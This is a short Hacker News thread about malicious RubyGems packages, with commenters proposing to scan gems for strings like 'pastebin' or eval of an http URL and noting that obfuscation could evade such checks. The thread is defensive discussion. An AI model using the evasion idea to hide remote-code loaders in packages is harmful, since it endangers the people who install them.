Hacker News new | ask | show | jobs
by htns 2493 days ago
Seems rather similar to the strong_password case from a month back: https://news.ycombinator.com/item?id=20377136 . I wonder if anyone has checked basic things like scanning all of rubygems for "pastebin" or "eval( * http * )".
1 comments
gotts 2493 days ago
it surprises me a bit.

I'm wondering why wouldn't RubyGems implement some basic form of malware detection? This type of code shouldn't be too hard to classify.

link
derimagia 2493 days ago
Malicious users would just change their code slightly to get past it. Use a different service than pastebin, or just obfuscating it more.
link
gotts 2493 days ago
After thinking about.. I think you must be right. Malware detection is not an easy task especially because of Ruby's dynamic nature.

Even simple open(), sleep(), eval() could be easily obfuscated.

link